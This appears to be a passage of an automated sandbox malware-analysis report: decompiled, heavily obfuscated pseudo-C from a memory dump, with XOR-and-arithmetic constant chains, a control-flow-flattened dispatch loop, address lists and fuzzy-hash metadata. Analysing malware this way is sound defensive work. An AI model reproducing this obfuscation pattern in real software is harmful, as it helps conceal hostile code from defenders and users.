                                                                                                                                                                                                                    				_v1636 = _v1636 + 0xffff8c4c;
                                                                                                                                                                                                                    				_v1636 = _v1636 ^ 0xfff668db;
                                                                                                                                                                                                                    				_v1596 = 0xc1241e;
                                                                                                                                                                                                                    				_t481 = 0x55;
                                                                                                                                                                                                                    				_v1596 = _v1596 * 0x6c;
                                                                                                                                                                                                                    				_v1596 = _v1596 | 0x0af9141d;
                                                                                                                                                                                                                    				_v1596 = _v1596 ^ 0x5bf94d60;
                                                                                                                                                                                                                    				_v1652 = 0x84116d;
                                                                                                                                                                                                                    				_v1652 = _v1652 << 0xb;
                                                                                                                                                                                                                    				_v1652 = _v1652 * 0x51;
                                                                                                                                                                                                                    				_v1652 = _v1652 * 0x31;
                                                                                                                                                                                                                    				_v1652 = _v1652 ^ 0x91570a81;
                                                                                                                                                                                                                    				_v1692 = 0xcd0a68;
                                                                                                                                                                                                                    				_v1692 = _v1692 ^ 0x76d571b4;
                                                                                                                                                                                                                    				_v1692 = _v1692 + 0xffffc9a8;
                                                                                                                                                                                                                    				_v1692 = _v1692 / _t430;
                                                                                                                                                                                                                    				_v1692 = _v1692 ^ 0x0130d1fe;
                                                                                                                                                                                                                    				_v1668 = 0xd72774;
                                                                                                                                                                                                                    				_v1668 = _v1668 >> 0xe;
                                                                                                                                                                                                                    				_v1668 = _v1668 >> 1;
                                                                                                                                                                                                                    				_v1668 = _v1668 ^ 0x26aa2158;
                                                                                                                                                                                                                    				_v1668 = _v1668 ^ 0x26a3133b;
                                                                                                                                                                                                                    				_v1576 = 0xc5f32f;
                                                                                                                                                                                                                    				_v1576 = _v1576 >> 4;
                                                                                                                                                                                                                    				_v1576 = _v1576 ^ 0x0003886e;
                                                                                                                                                                                                                    				_v1592 = 0x484657;
                                                                                                                                                                                                                    				_v1592 = _v1592 << 0xc;
                                                                                                                                                                                                                    				_v1592 = _v1592 ^ 0x846d7526;
                                                                                                                                                                                                                    				_v1628 = 0x852e96;
                                                                                                                                                                                                                    				_v1628 = _v1628 >> 0xa;
                                                                                                                                                                                                                    				_v1628 = _v1628 >> 5;
                                                                                                                                                                                                                    				_v1628 = _v1628 ^ 0x0004cdde;
                                                                                                                                                                                                                    				_v1684 = 0xc511b;
                                                                                                                                                                                                                    				_v1684 = _v1684 << 0xd;
                                                                                                                                                                                                                    				_v1684 = _v1684 / _t481;
                                                                                                                                                                                                                    				_t482 = 0x2a;
                                                                                                                                                                                                                    				_v1684 = _v1684 * 0x7c;
                                                                                                                                                                                                                    				_v1684 = _v1684 ^ 0xc98803e7;
                                                                                                                                                                                                                    				_v1616 = 0x767ed;
                                                                                                                                                                                                                    				_v1616 = _v1616 ^ 0xd2561822;
                                                                                                                                                                                                                    				_v1616 = _v1616 / _t482;
                                                                                                                                                                                                                    				_v1616 = _v1616 ^ 0x050140ff;
                                                                                                                                                                                                                    				_v1608 = 0xdfbec3;
                                                                                                                                                                                                                    				_v1608 = _v1608 >> 1;
                                                                                                                                                                                                                    				_v1608 = _v1608 << 8;
                                                                                                                                                                                                                    				_v1608 = _v1608 ^ 0x6fd948ff;
                                                                                                                                                                                                                    				_v1612 = 0x328836;
                                                                                                                                                                                                                    				_v1612 = _v1612 * 9;
                                                                                                                                                                                                                    				_v1612 = _v1612 << 2;
                                                                                                                                                                                                                    				_v1612 = _v1612 ^ 0x0717b439;
                                                                                                                                                                                                                    				_v1696 = 0x205ac9;
                                                                                                                                                                                                                    				_v1696 = _v1696 >> 0xe;
                                                                                                                                                                                                                    				_v1696 = _v1696 >> 1;
                                                                                                                                                                                                                    				_v1696 = _v1696 + 0xffff263c;
                                                                                                                                                                                                                    				_v1696 = _v1696 ^ 0xfff4f202;
                                                                                                                                                                                                                    				_v1620 = 0x72883;
                                                                                                                                                                                                                    				_v1620 = _v1620 | 0x18212412;
                                                                                                                                                                                                                    				_v1620 = _v1620 * 0x1f;
                                                                                                                                                                                                                    				_v1620 = _v1620 ^ 0xecbad5e5;
                                                                                                                                                                                                                    				_v1704 = 0x6d5c2;
                                                                                                                                                                                                                    				_v1704 = _v1704 | 0x17ece418;
                                                                                                                                                                                                                    				_v1704 = _v1704 * 0x34;
                                                                                                                                                                                                                    				_v1704 = _v1704 | 0xbffd0635;
                                                                                                                                                                                                                    				_v1704 = _v1704 ^ 0xfff4bf69;
                                                                                                                                                                                                                    				_v1664 = 0x7a2d99;
                                                                                                                                                                                                                    				_t483 = 0x54;
                                                                                                                                                                                                                    				_v1664 = _v1664 / _t483;
                                                                                                                                                                                                                    				_v1664 = _v1664 ^ 0xb12eb1d8;
                                                                                                                                                                                                                    				_t484 = 0x14;
                                                                                                                                                                                                                    				_v1664 = _v1664 * 0x51;
                                                                                                                                                                                                                    				_v1664 = _v1664 ^ 0x101c182a;
                                                                                                                                                                                                                    				_v1672 = 0x83c553;
                                                                                                                                                                                                                    				_v1672 = _v1672 / _t484;
                                                                                                                                                                                                                    				_v1672 = _v1672 >> 0xc;
                                                                                                                                                                                                                    				_t485 = 0x5e;
                                                                                                                                                                                                                    				_v1672 = _v1672 / _t485;
                                                                                                                                                                                                                    				_v1672 = _v1672 ^ 0x000cb12d;
                                                                                                                                                                                                                    				_v1680 = 0x1262ce;
                                                                                                                                                                                                                    				_v1680 = _v1680 + 0xffffecd4;
                                                                                                                                                                                                                    				_v1680 = _v1680 | 0x37d5dd31;
                                                                                                                                                                                                                    				_v1680 = _v1680 ^ 0x763398f9;
                                                                                                                                                                                                                    				_v1680 = _v1680 ^ 0x41efce3d;
                                                                                                                                                                                                                    				_v1688 = 0xf821e5;
                                                                                                                                                                                                                    				_v1688 = _v1688 | 0x410e2410;
                                                                                                                                                                                                                    				_v1688 = _v1688 << 5;
                                                                                                                                                                                                                    				_v1688 = _v1688 ^ 0x7677bee1;
                                                                                                                                                                                                                    				_v1688 = _v1688 ^ 0x49b1d744;
                                                                                                                                                                                                                    				_v1580 = 0xfe3061;
                                                                                                                                                                                                                    				_t486 = 0x6c;
                                                                                                                                                                                                                    				_v1580 = _v1580 / _t486;
                                                                                                                                                                                                                    				_v1580 = _v1580 ^ 0x000aedd8;
                                                                                                                                                                                                                    				_v1604 = 0x3b2541;
                                                                                                                                                                                                                    				_v1604 = _v1604 + 0xffffebe5;
                                                                                                                                                                                                                    				_v1604 = _v1604 + 0x9f9c;
                                                                                                                                                                                                                    				_v1604 = _v1604 ^ 0x003f9ea7;
                                                                                                                                                                                                                    				_v1656 = 0xbb419c;
                                                                                                                                                                                                                    				_v1656 = _v1656 >> 8;
                                                                                                                                                                                                                    				_v1656 = _v1656 ^ 0xabc2c53f;
                                                                                                                                                                                                                    				_v1656 = _v1656 << 0xb;
                                                                                                                                                                                                                    				_v1656 = _v1656 ^ 0x13f98b6c;
                                                                                                                                                                                                                    				_v1584 = 0x6340c7;
                                                                                                                                                                                                                    				_v1584 = _v1584 + 0xffff01f6;
                                                                                                                                                                                                                    				_v1584 = _v1584 ^ 0x006cdcee;
                                                                                                                                                                                                                    				_v1640 = 0x7e5866;
                                                                                                                                                                                                                    				_v1640 = _v1640 * 0x33;
                                                                                                                                                                                                                    				_v1640 = _v1640 * 0x55;
                                                                                                                                                                                                                    				_v1640 = _v1640 | 0x36fc09d1;
                                                                                                                                                                                                                    				_v1640 = _v1640 ^ 0x7ff16342;
                                                                                                                                                                                                                    				_v1648 = 0xb2f2b7;
                                                                                                                                                                                                                    				_v1648 = _v1648 >> 0xf;
                                                                                                                                                                                                                    				_v1648 = _v1648 << 3;
                                                                                                                                                                                                                    				_v1648 = _v1648 ^ 0x145320b9;
                                                                                                                                                                                                                    				_v1648 = _v1648 ^ 0x145ce883;
                                                                                                                                                                                                                    				_v1588 = 0x5a6efc;
                                                                                                                                                                                                                    				_v1588 = _v1588 ^ 0x726265f0;
                                                                                                                                                                                                                    				_v1588 = _v1588 ^ 0x723d5b35;
                                                                                                                                                                                                                    				_v1632 = 0x62f65a;
                                                                                                                                                                                                                    				_v1632 = _v1632 ^ 0x2fe19840;
                                                                                                                                                                                                                    				_v1632 = _v1632 ^ 0xb5d7c11e;
                                                                                                                                                                                                                    				_v1632 = _v1632 ^ 0x9a57d430;
                                                                                                                                                                                                                    				while(_t432 != 0x3e602e4) {
                                                                                                                                                                                                                    					if(_t432 == 0x5fb3938) {
                                                                                                                                                                                                                    						_push(_v1704);
                                                                                                                                                                                                                    						_push(_v1620);
                                                                                                                                                                                                                    						_push(_v1696);
                                                                                                                                                                                                                    						_t409 = E00A81E60(0xa611ec, _v1612, __eflags);
                                                                                                                                                                                                                    						E00A67582( &_v1560, __eflags);
                                                                                                                                                                                                                    						E00A7513A(_v1672, __eflags,  &_v520, 0, _v1680,  *0xa83b38 + 0x21c,  &_v1040,  *0xa83b38 + 0xc, _v1688,  &_v1560, _t409,  &_v1560, _v1580);
                                                                                                                                                                                                                    						E00A7D6DF(_v1604, _t409, _v1656, _v1584);
                                                                                                                                                                                                                    						_t491 =  &(_t491[0x10]);
                                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                    						if(_t432 == 0x8fde3bb) {
                                                                                                                                                                                                                    							E00A7E4D8(_v1712, _v1624, _t432, _t432, _v1676, _t432, _v1660,  &_v1040, _v1600);
                                                                                                                                                                                                                    							_t491 =  &(_t491[7]);
                                                                                                                                                                                                                    							_t432 = 0xae966e4;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							_t497 = _t432 - 0xae966e4;
                                                                                                                                                                                                                    							if(_t432 == 0xae966e4) {
                                                                                                                                                                                                                    								_push(_v1636);
                                                                                                                                                                                                                    								_push(_v1708);
                                                                                                                                                                                                                    								_push(_v1644);
                                                                                                                                                                                                                    								_t420 = E00A81E60(0xa6111c, _v1700, _t497);
                                                                                                                                                                                                                    								E00A67582( &_v1560, _t497);
                                                                                                                                                                                                                    								E00A7DCF9(_v1596,  *0xa83b38 + 0x21c, _t420, _v1652,  *0xa83b38 + 0x21c, _v1692, _v1668,  &_v1560, 0x104,  &_v1040,  &_v520, _v1576, _v1592, _v1628);
                                                                                                                                                                                                                    								E00A7D6DF(_v1684, _t420, _v1616, _v1608);
                                                                                                                                                                                                                    								_t491 =  &(_t491[0x11]);
                                                                                                                                                                                                                    								L6:
                                                                                                                                                                                                                    								_t432 = 0x3e602e4;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                                    					__eflags = _t432 - 0x6c0ee67;
                                                                                                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					return _t477;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(_v1632);
                                                                                                                                                                                                                    				_push( &_v520);
                                                                                                                                                                                                                    				_push(_v1588);
                                                                                                                                                                                                                    				_push(_v1648);
                                                                                                                                                                                                                    				_t408 = E00A7E05C(_v1640, __eflags);
                                                                                                                                                                                                                    				_t491 =  &(_t491[7]);
                                                                                                                                                                                                                    				__eflags = _t408;
                                                                                                                                                                                                                    				_t477 =  !=  ? 1 : _t477;
                                                                                                                                                                                                                    				_t432 = 0x6c0ee67;
                                                                                                                                                                                                                    				goto L10;
                                                                                                                                                                                                                    			}





























































                                                                                                                                                                                                                    0x00a7810d
                                                                                                                                                                                                                    0x00a78116
                                                                                                                                                                                                                    0x00a78117
                                                                                                                                                                                                                    0x00a78118
                                                                                                                                                                                                                    0x00a7811d
                                                                                                                                                                                                                    0x00a78128
                                                                                                                                                                                                                    0x00a7812b
                                                                                                                                                                                                                    0x00a78138
                                                                                                                                                                                                                    0x00a7813f
                                                                                                                                                                                                                    0x00a78144
                                                                                                                                                                                                                    0x00a7814c
                                                                                                                                                                                                                    0x00a78154
                                                                                                                                                                                                                    0x00a78159
                                                                                                                                                                                                                    0x00a7815f
                                                                                                                                                                                                                    0x00a78167
                                                                                                                                                                                                                    0x00a7816c
                                                                                                                                                                                                                    0x00a78171
                                                                                                                                                                                                                    0x00a78179
                                                                                                                                                                                                                    0x00a7817e
                                                                                                                                                                                                                    0x00a78186
                                                                                                                                                                                                                    0x00a7818e
                                                                                                                                                                                                                    0x00a78196
                                                                                                                                                                                                                    0x00a781a2
                                                                                                                                                                                                                    0x00a781a7
                                                                                                                                                                                                                    0x00a781b2
                                                                                                                                                                                                                    0x00a781b5
                                                                                                                                                                                                                    0x00a781b9
                                                                                                                                                                                                                    0x00a781c1
                                                                                                                                                                                                                    0x00a781c9
                                                                                                                                                                                                                    0x00a781ce
                                                                                                                                                                                                                    0x00a781db
                                                                                                                                                                                                                    0x00a781df
                                                                                                                                                                                                                    0x00a781e7
                                                                                                                                                                                                                    0x00a781f2
                                                                                                                                                                                                                    0x00a781fd
                                                                                                                                                                                                                    0x00a78205
                                                                                                                                                                                                                    0x00a78210
                                                                                                                                                                                                                    0x00a78218
                                                                                                                                                                                                                    0x00a7821d
                                                                                                                                                                                                                    0x00a7822a
                                                                                                                                                                                                                    0x00a7822e
                                                                                                                                                                                                                    0x00a78236
                                                                                                                                                                                                                    0x00a7823e
                                                                                                                                                                                                                    0x00a78246
                                                                                                                                                                                                                    0x00a78253
                                                                                                                                                                                                                    0x00a78254
                                                                                                                                                                                                                    0x00a78258
                                                                                                                                                                                                                    0x00a78260
                                                                                                                                                                                                                    0x00a78268
                                                                                                                                                                                                                    0x00a78273
                                                                                                                                                                                                                    0x00a78277
                                                                                                                                                                                                                    0x00a7827f
                                                                                                                                                                                                                    0x00a78287
                                                                                                                                                                                                                    0x00a7828f
                                                                                                                                                                                                                    0x00a78294
                                                                                                                                                                                                                    0x00a7829c
                                                                                                                                                                                                                    0x00a782a4
                                                                                                                                                                                                                    0x00a782bb
                                                                                                                                                                                                                    0x00a782be
                                                                                                                                                                                                                    0x00a782c5
                                                                                                                                                                                                                    0x00a782d0
                                                                                                                                                                                                                    0x00a782db
                                                                                                                                                                                                                    0x00a782e3
                                                                                                                                                                                                                    0x00a782ed
                                                                                                                                                                                                                    0x00a782f6
                                                                                                                                                                                                                    0x00a782fa
                                                                                                                                                                                                                    0x00a78302
                                                                                                                                                                                                                    0x00a7830a
                                                                                                                                                                                                                    0x00a78312
                                                                                                                                                                                                                    0x00a78322
                                                                                                                                                                                                                    0x00a78326
                                                                                                                                                                                                                    0x00a7832e
                                                                                                                                                                                                                    0x00a78336
                                                                                                                                                                                                                    0x00a7833b
                                                                                                                                                                                                                    0x00a7833f
                                                                                                                                                                                                                    0x00a78347
                                                                                                                                                                                                                    0x00a7834f
                                                                                                                                                                                                                    0x00a7835a
                                                                                                                                                                                                                    0x00a78362
                                                                                                                                                                                                                    0x00a7836d
                                                                                                                                                                                                                    0x00a78378
                                                                                                                                                                                                                    0x00a78380
                                                                                                                                                                                                                    0x00a7838b
                                                                                                                                                                                                                    0x00a78393
                                                                                                                                                                                                                    0x00a78398
                                                                                                                                                                                                                    0x00a7839d
                                                                                                                                                                                                                    0x00a783a5
                                                                                                                                                                                                                    0x00a783ad
                                                                                                                                                                                                                    0x00a783ba
                                                                                                                                                                                                                    0x00a783c3
                                                                                                                                                                                                                    0x00a783c4
                                                                                                                                                                                                                    0x00a783c8
                                                                                                                                                                                                                    0x00a783d0
                                                                                                                                                                                                                    0x00a783d8
                                                                                                                                                                                                                    0x00a783e6
                                                                                                                                                                                                                    0x00a783ea
                                                                                                                                                                                                                    0x00a783f2
                                                                                                                                                                                                                    0x00a783fa
                                                                                                                                                                                                                    0x00a783fe
                                                                                                                                                                                                                    0x00a78403
                                                                                                                                                                                                                    0x00a7840b
                                                                                                                                                                                                                    0x00a78418
                                                                                                                                                                                                                    0x00a7841c
                                                                                                                                                                                                                    0x00a78421
                                                                                                                                                                                                                    0x00a78429
                                                                                                                                                                                                                    0x00a78431
                                                                                                                                                                                                                    0x00a78436
                                                                                                                                                                                                                    0x00a7843a
                                                                                                                                                                                                                    0x00a78442
                                                                                                                                                                                                                    0x00a7844a
                                                                                                                                                                                                                    0x00a78452
                                                                                                                                                                                                                    0x00a7845f
                                                                                                                                                                                                                    0x00a78463
                                                                                                                                                                                                                    0x00a7846b
                                                                                                                                                                                                                    0x00a78473
                                                                                                                                                                                                                    0x00a78480
                                                                                                                                                                                                                    0x00a78484
                                                                                                                                                                                                                    0x00a7848c
                                                                                                                                                                                                                    0x00a78494
                                                                                                                                                                                                                    0x00a784a9
                                                                                                                                                                                                                    0x00a784ae
                                                                                                                                                                                                                    0x00a784b4
                                                                                                                                                                                                                    0x00a784c1
                                                                                                                                                                                                                    0x00a784c4
                                                                                                                                                                                                                    0x00a784c8
                                                                                                                                                                                                                    0x00a784d0
                                                                                                                                                                                                                    0x00a784e0
                                                                                                                                                                                                                    0x00a784e4
                                                                                                                                                                                                                    0x00a784ed
                                                                                                                                                                                                                    0x00a784f2
                                                                                                                                                                                                                    0x00a784f8
                                                                                                                                                                                                                    0x00a78500
                                                                                                                                                                                                                    0x00a78508
                                                                                                                                                                                                                    0x00a78510
                                                                                                                                                                                                                    0x00a78518
                                                                                                                                                                                                                    0x00a78520
                                                                                                                                                                                                                    0x00a78528
                                                                                                                                                                                                                    0x00a78530
                                                                                                                                                                                                                    0x00a78538
                                                                                                                                                                                                                    0x00a7853d
                                                                                                                                                                                                                    0x00a78545
                                                                                                                                                                                                                    0x00a7854d
                                                                                                                                                                                                                    0x00a7855f
                                                                                                                                                                                                                    0x00a78562
                                                                                                                                                                                                                    0x00a78569
                                                                                                                                                                                                                    0x00a78574
                                                                                                                                                                                                                    0x00a7857c
                                                                                                                                                                                                                    0x00a78584
                                                                                                                                                                                                                    0x00a7858c
                                                                                                                                                                                                                    0x00a78594
                                                                                                                                                                                                                    0x00a7859c
                                                                                                                                                                                                                    0x00a785a1
                                                                                                                                                                                                                    0x00a785a9
                                                                                                                                                                                                                    0x00a785ae
                                                                                                                                                                                                                    0x00a785b6
                                                                                                                                                                                                                    0x00a785c1
                                                                                                                                                                                                                    0x00a785cc
                                                                                                                                                                                                                    0x00a785d7
                                                                                                                                                                                                                    0x00a785e4
                                                                                                                                                                                                                    0x00a785ed
                                                                                                                                                                                                                    0x00a785f1
                                                                                                                                                                                                                    0x00a785f9
                                                                                                                                                                                                                    0x00a78601
                                                                                                                                                                                                                    0x00a78609
                                                                                                                                                                                                                    0x00a7860e
                                                                                                                                                                                                                    0x00a78613
                                                                                                                                                                                                                    0x00a7861b
                                                                                                                                                                                                                    0x00a78623
                                                                                                                                                                                                                    0x00a7862e
                                                                                                                                                                                                                    0x00a78639
                                                                                                                                                                                                                    0x00a78644
                                                                                                                                                                                                                    0x00a7864c
                                                                                                                                                                                                                    0x00a78654
                                                                                                                                                                                                                    0x00a7865c
                                                                                                                                                                                                                    0x00a78664
                                                                                                                                                                                                                    0x00a78672
                                                                                                                                                                                                                    0x00a7876e
                                                                                                                                                                                                                    0x00a78777
                                                                                                                                                                                                                    0x00a7877b
                                                                                                                                                                                                                    0x00a78786
                                                                                                                                                                                                                    0x00a78797
                                                                                                                                                                                                                    0x00a787df
                                                                                                                                                                                                                    0x00a787f8
                                                                                                                                                                                                                    0x00a787fd
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a78678
                                                                                                                                                                                                                    0x00a7867e
                                                                                                                                                                                                                    0x00a7875c
                                                                                                                                                                                                                    0x00a78761
                                                                                                                                                                                                                    0x00a78764
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a78684
                                                                                                                                                                                                                    0x00a78684
                                                                                                                                                                                                                    0x00a7868a
                                                                                                                                                                                                                    0x00a78690
                                                                                                                                                                                                                    0x00a78699
                                                                                                                                                                                                                    0x00a7869d
                                                                                                                                                                                                                    0x00a786a5
                                                                                                                                                                                                                    0x00a786b3
                                                                                                                                                                                                                    0x00a78712
                                                                                                                                                                                                                    0x00a7872b
                                                                                                                                                                                                                    0x00a78730
                                                                                                                                                                                                                    0x00a78733
                                                                                                                                                                                                                    0x00a78733
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a78733
                                                                                                                                                                                                                    0x00a7868a
                                                                                                                                                                                                                    0x00a7867e
                                                                                                                                                                                                                    0x00a78838
                                                                                                                                                                                                                    0x00a78838
                                                                                                                                                                                                                    0x00a7883e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a78850
                                                                                                                                                                                                                    0x00a78850
                                                                                                                                                                                                                    0x00a78805
                                                                                                                                                                                                                    0x00a78806
                                                                                                                                                                                                                    0x00a78807
                                                                                                                                                                                                                    0x00a78808
                                                                                                                                                                                                                    0x00a78813
                                                                                                                                                                                                                    0x00a78814
                                                                                                                                                                                                                    0x00a7881b
                                                                                                                                                                                                                    0x00a78823
                                                                                                                                                                                                                    0x00a7882a
                                                                                                                                                                                                                    0x00a7882e
                                                                                                                                                                                                                    0x00a78830
                                                                                                                                                                                                                    0x00a78833
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: .$5[=r$A%;$fX~$f$f
                                                                                                                                                                                                                    • API String ID: 0-4226228338
                                                                                                                                                                                                                    • Opcode ID: 7261e3c00d52db22434203cf244b193d1ae6662597e9ac28490ee528732c8a6b
                                                                                                                                                                                                                    • Instruction ID: 5b7ac233f848e861bd956a19948e27f6be23e57074d719111ce09d8e86a531c6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7261e3c00d52db22434203cf244b193d1ae6662597e9ac28490ee528732c8a6b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4602FEB15083809FD368CF65C98AA4BFBF5FBC4758F50891DF29A86220D7B18949CF52
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                                                                                                    			E00A6A17E() {
                                                                                                                                                                                                                    				char _v4;
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                    				signed int _v84;
                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                    				signed int _v96;
                                                                                                                                                                                                                    				signed int _v100;
                                                                                                                                                                                                                    				signed int _v104;
                                                                                                                                                                                                                    				signed int _v108;
                                                                                                                                                                                                                    				signed int _v112;
                                                                                                                                                                                                                    				signed int _v116;
                                                                                                                                                                                                                    				signed int _v120;
                                                                                                                                                                                                                    				signed int _v124;
                                                                                                                                                                                                                    				signed int _v128;
                                                                                                                                                                                                                    				signed int _v132;
                                                                                                                                                                                                                    				signed int _v136;
                                                                                                                                                                                                                    				signed int _v140;
                                                                                                                                                                                                                    				void* _t386;
                                                                                                                                                                                                                    				void* _t396;
                                                                                                                                                                                                                    				intOrPtr _t399;
                                                                                                                                                                                                                    				intOrPtr _t403;
                                                                                                                                                                                                                    				void* _t405;
                                                                                                                                                                                                                    				signed int _t407;
                                                                                                                                                                                                                    				signed int _t408;
                                                                                                                                                                                                                    				signed int _t409;
                                                                                                                                                                                                                    				signed int _t410;
                                                                                                                                                                                                                    				signed int _t411;
                                                                                                                                                                                                                    				signed int _t412;
                                                                                                                                                                                                                    				signed int _t413;
                                                                                                                                                                                                                    				signed int _t414;
                                                                                                                                                                                                                    				signed int _t415;
                                                                                                                                                                                                                    				signed int _t416;
                                                                                                                                                                                                                    				signed int _t417;
                                                                                                                                                                                                                    				signed int _t418;
                                                                                                                                                                                                                    				intOrPtr _t467;
                                                                                                                                                                                                                    				void* _t469;
                                                                                                                                                                                                                    				signed int _t471;
                                                                                                                                                                                                                    				signed int* _t474;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t474 =  &_v140;
                                                                                                                                                                                                                    				_v104 = 0x9a690a;
                                                                                                                                                                                                                    				_t407 = 0x71;
                                                                                                                                                                                                                    				_v104 = _v104 / _t407;
                                                                                                                                                                                                                    				_v104 = _v104 + 0xc37;
                                                                                                                                                                                                                    				_t405 = 0;
                                                                                                                                                                                                                    				_v104 = _v104 ^ 0x123839a6;
                                                                                                                                                                                                                    				_t469 = 0x5f7a537;
                                                                                                                                                                                                                    				_v104 = _v104 ^ 0x123953a1;
                                                                                                                                                                                                                    				_v48 = 0x8db59;
                                                                                                                                                                                                                    				_v48 = _v48 >> 0xe;
                                                                                                                                                                                                                    				_t408 = 0x62;
                                                                                                                                                                                                                    				_v48 = _v48 * 0x16;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x00000302;
                                                                                                                                                                                                                    				_v44 = 0x31868c;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x2726ef12;
                                                                                                                                                                                                                    				_v44 = _v44 + 0xffffe42b;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x27174dc9;
                                                                                                                                                                                                                    				_v72 = 0xfacd99;
                                                                                                                                                                                                                    				_v72 = _v72 + 0xffff54a1;
                                                                                                                                                                                                                    				_v72 = _v72 + 0xffff932a;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0x00f9b564;
                                                                                                                                                                                                                    				_v68 = 0x10f042;
                                                                                                                                                                                                                    				_v68 = _v68 / _t408;
                                                                                                                                                                                                                    				_t409 = 0x25;
                                                                                                                                                                                                                    				_v68 = _v68 / _t409;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x00000132;
                                                                                                                                                                                                                    				_v56 = 0xe23fb3;
                                                                                                                                                                                                                    				_v56 = _v56 + 0xe466;
                                                                                                                                                                                                                    				_v56 = _v56 + 0xfffff9ce;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x00ef4355;
                                                                                                                                                                                                                    				_v136 = 0x63fd26;
                                                                                                                                                                                                                    				_v136 = _v136 >> 0xd;
                                                                                                                                                                                                                    				_t410 = 0x50;
                                                                                                                                                                                                                    				_v136 = _v136 / _t410;
                                                                                                                                                                                                                    				_t411 = 6;
                                                                                                                                                                                                                    				_v136 = _v136 / _t411;
                                                                                                                                                                                                                    				_v136 = _v136 ^ 0x00011609;
                                                                                                                                                                                                                    				_v128 = 0x8e031d;
                                                                                                                                                                                                                    				_t412 = 0x79;
                                                                                                                                                                                                                    				_v128 = _v128 * 0x2e;
                                                                                                                                                                                                                    				_v128 = _v128 / _t412;
                                                                                                                                                                                                                    				_v128 = _v128 << 0xf;
                                                                                                                                                                                                                    				_v128 = _v128 ^ 0xfe72a5d5;
                                                                                                                                                                                                                    				_v112 = 0xe3ce;
                                                                                                                                                                                                                    				_v112 = _v112 << 5;
                                                                                                                                                                                                                    				_v112 = _v112 + 0x5d8e;
                                                                                                                                                                                                                    				_t413 = 7;
                                                                                                                                                                                                                    				_v112 = _v112 / _t413;
                                                                                                                                                                                                                    				_v112 = _v112 ^ 0x00005b14;
                                                                                                                                                                                                                    				_v24 = 0x8a10af;
                                                                                                                                                                                                                    				_v24 = _v24 | 0x391bdccc;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x3991e2e5;
                                                                                                                                                                                                                    				_v120 = 0x2eff89;
                                                                                                                                                                                                                    				_v120 = _v120 >> 0xa;
                                                                                                                                                                                                                    				_v120 = _v120 >> 4;
                                                                                                                                                                                                                    				_v120 = _v120 | 0xb39c5f1d;
                                                                                                                                                                                                                    				_v120 = _v120 ^ 0xb390e5bd;
                                                                                                                                                                                                                    				_v16 = 0x15dab8;
                                                                                                                                                                                                                    				_t414 = 0x46;
                                                                                                                                                                                                                    				_v16 = _v16 / _t414;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x00070aeb;
                                                                                                                                                                                                                    				_v96 = 0xb5c161;
                                                                                                                                                                                                                    				_v96 = _v96 << 0xb;
                                                                                                                                                                                                                    				_v96 = _v96 >> 0xc;
                                                                                                                                                                                                                    				_v96 = _v96 ^ 0x47b59577;
                                                                                                                                                                                                                    				_v96 = _v96 ^ 0x47bbe105;
                                                                                                                                                                                                                    				_v140 = 0x68e2d1;
                                                                                                                                                                                                                    				_v140 = _v140 ^ 0x6398f4f5;
                                                                                                                                                                                                                    				_v140 = _v140 + 0xffff6af9;
                                                                                                                                                                                                                    				_t471 = 0x44;
                                                                                                                                                                                                                    				_t415 = 0x37;
                                                                                                                                                                                                                    				_v140 = _v140 * 0x61;
                                                                                                                                                                                                                    				_v140 = _v140 ^ 0xddb76620;
                                                                                                                                                                                                                    				_v64 = 0xc4b303;
                                                                                                                                                                                                                    				_v64 = _v64 >> 9;
